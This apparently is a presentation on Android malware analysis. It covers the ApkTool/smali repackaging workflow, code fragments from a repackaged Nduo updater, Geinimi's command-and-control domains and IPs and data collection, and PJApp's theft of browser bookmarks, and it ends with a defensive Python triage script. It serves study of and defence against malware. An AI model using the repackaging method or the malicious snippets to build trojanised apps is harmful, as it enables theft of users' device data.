Page 1
Malware: Apk Explorer Series .2
Page 2
Malware @ Android
Page 3
Nduo (N多)
Made by Nduo
[Diagram labels: Apk, Apk, Nduo Apk]
Page 4
How it is done
.apk
• Unzip
.dex
• Decompile: ApkTool[1], Dex2Jar[2]
.smali
• Modify: Smali[4]
new.apk
• Repack: ApkTool
Page 5
Wet feet
```java
AlertDialog alertDialog = new AlertDialog.Builder(this).create();
alertDialog.setTitle("LALALA");
alertDialog.setMessage("You should see me!!!!!!!");
alertDialog.show();
```
AlertDialog Java Code
Page 6
Wet feet cont.
```smali
new-instance v1, Landroid/app/AlertDialog$Builder;
# v1=(UninitRef);
invoke-direct {v1, p0}, Landroid/app/AlertDialog$Builder;-><init>(Landroid/content/Context;)V
# v1=(Reference);
invoke-virtual {v1}, Landroid/app/AlertDialog$Builder;->create()Landroid/app/AlertDialog;
move-result-object v0
.local v0, alertDialog:Landroid/app/AlertDialog;
# v0=(Reference);
const-string v1, "LALALA"
invoke-virtual {v0, v1}, Landroid/app/AlertDialog;->setTitle(Ljava/lang/CharSequence;)V
const-string v1, "You should see me!!!!!!!"
invoke-virtual {v0, v1}, Landroid/app/AlertDialog;->setMessage(Ljava/lang/CharSequence;)V
invoke-virtual {v0}, Landroid/app/AlertDialog;->show()V
```
AlertDialog Op-code
Page 7
Wet feet cont.
Yingyonghui Java code (SplashActivity.java)
```smali
.method public onCreate(Landroid/os/Bundle;)V
    .locals 12
    .parameter "savedInstanceState"
    .prologue
    const/16 v11, 0x400
    # v11=(PosShort);
    const/4 v10, 0x0
    # v10=(Null);
    const/4 v9, 0x1
    # v9=(One);
    invoke-super {p0, p1}, Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V
```
AlertDialog Op-code
Page 8
Wet feet cont.
HideFile Java code (HideFiles.java)
```java
getPackageInfo("com.nduoa.market", 0);
("使用N多市场, \n帮助维护「%s」的更新?", …)
localBuilder2.setPositiveButton("安装 ", locald);
a.a("http://market.nduoa.com/update/nDuoaMarket.apk", str2);
i.a("KAWAHAeBUBLBaBBAMAPBRAEAIAWAMBdAKBbALAUABBCABBOAABdAQANAeABBaANAaABAOBPBTAGACBOATBDBAB");
```
The dialog text reads "Use Nduo Market to help maintain updates for 「%s」?", and the positive button is labelled "安装" ("Install").
Page 9
Geinimi[6]
Page 10
Geinimi cont.
www.widifu.com www.udaore.com
www.frijd.com www.islpast.com www.piajesj.com www.qoewsl.com www.weolir.com www.uisoa.com www.riusdu.com www.aiucr.com
117.135.134.185 180.168.68.34
Geinimi
• Access the user's geo-location based on coordinates given by the GPS
• Send or receive SMS messages
• Access the user's mailbox
• Read and modify the user's phonebook contacts
• Read and modify the user's browsing history
• Check running processes in memory
• Terminate legitimate running process in the device
• Install shortcuts
• Perform web queries
• Change the wallpaper of the device
Board, Brand, CPID, CPU ABI, Device, DID, Display, Fingerprint, Host, Line1 Number, Manufacturer, Model, Network Country ISO, Network Operator, Network Operator Name, Network Type, Phone Type, Product
PTID, SALESID, SDK version, Shell, SIM Country ISO, SIM Operator, SIM Operator Name, SIM Serial Number, SIM State, Software Version, Subscriber ID, Tags, Time, Type, User, Voice mail Number
Page 11
PJApp 泡椒 [3][5]
"content://browser/bookmarks"
MEEGO91.COM
Channel activation (渠道激活)
IMEI / SIM / IMSI / ICCID / Pdus……
Default Browser
SEND ALL Bookmarks
ADD android.paojiao.cn, ct2.paojiao.cn, g3g3.cn
com.uc.browser, com.tencent.mtt, com.opera.mini.android, mobi.mgeek.TunnyBrowser, com.skyfire.browser, com.kolbysoft.steel, com.android.browser
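As an added defender-side example (my own code, not from the deck or from the tools it cites), a first-pass triage over decoded smali that pulls out the indicators the slides point at: the update URL, the bookmarks content URI, the package probe, and the IMEI/IMSI/ICCID reads. The smali sample is constructed for the demo; the method signatures are real Android API descriptors.

```python
import re

# Constructed smali excerpt for this demo (not decoded from any real APK): the
# AlertDialog lines from the slides mixed with the strings and calls the deck
# attributes to the Nduo updater and to PJApp.
SAMPLE_SMALI = """\
const-string v1, "LALALA"
invoke-virtual {v0, v1}, Landroid/app/AlertDialog;->setTitle(Ljava/lang/CharSequence;)V
const-string v2, "content://browser/bookmarks"
invoke-static {v2}, Landroid/net/Uri;->parse(Ljava/lang/String;)Landroid/net/Uri;
const-string v3, "http://market.nduoa.com/update/nDuoaMarket.apk"
const-string v4, "com.nduoa.market"
invoke-virtual {v5, v4, v6}, Landroid/content/pm/PackageManager;->getPackageInfo(Ljava/lang/String;I)Landroid/content/pm/PackageInfo;
invoke-virtual {v7}, Landroid/telephony/TelephonyManager;->getDeviceId()Ljava/lang/String;
invoke-virtual {v7}, Landroid/telephony/TelephonyManager;->getSubscriberId()Ljava/lang/String;
invoke-virtual {v7}, Landroid/telephony/TelephonyManager;->getSimSerialNumber()Ljava/lang/String;
"""

# Real Android method signatures, mapped to the identifier or action each exposes.
SENSITIVE_CALLS = {
    "Landroid/telephony/TelephonyManager;->getDeviceId()": "IMEI",
    "Landroid/telephony/TelephonyManager;->getSubscriberId()": "IMSI",
    "Landroid/telephony/TelephonyManager;->getSimSerialNumber()": "ICCID",
    "Landroid/telephony/SmsManager;->sendTextMessage(": "SMS send",
}

CONST_STRING = re.compile(r'^\s*const-string(?:/jumbo)?\s+[vp]\d+,\s*"((?:[^"\\]|\\.)*)"')
PACKAGE_NAME = re.compile(r"(?:[a-z_][a-z0-9_]*\.){2,}[a-z0-9_]+", re.IGNORECASE)


def extract_strings(smali):
    """Return every const-string literal, in source order."""
    return [m.group(1) for line in smali.splitlines() if (m := CONST_STRING.match(line))]


def triage(smali):
    """Bucket what an analyst checks first: URLs, content providers, package probes, sensitive calls."""
    report = {}
    for s in extract_strings(smali):
        if s.lower().startswith(("http://", "https://")):
            report.setdefault("urls", []).append(s)
        elif s.startswith("content://"):
            report.setdefault("content_uris", []).append(s)
        elif PACKAGE_NAME.fullmatch(s):
            report.setdefault("package_names", []).append(s)
    for line in smali.splitlines():
        for sig, label in SENSITIVE_CALLS.items():
            if sig in line:
                report.setdefault("sensitive_calls", []).append(label)
    return report
```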
Page 12
MEEGO91.COM
Registrant: nduo demi, nanchang jiangxi sic A501, nanchang, jiangxi 444001, China
Registered through: GoDaddy.com
Created on: 05-Sep-10
Expires on: 05-Sep-11
Administrative Contact: demi, nduo [email protected], jiangxi sic A501, nanchang, jiangxi 444001, China, +86.861363345678
Page 13
Reference
1. http://code.google.com/p/android-apktool/
2. http://code.google.com/p/dex2jar/
3. http://www.itnews.tk/archives/4761
4. http://code.google.com/p/smali/
5. http://globalthreatcenter.com/?cat=18
6. http://blog.mylookout.com/_media/Geinimi_Trojan_Teardown.pdf
Page 14
Questions?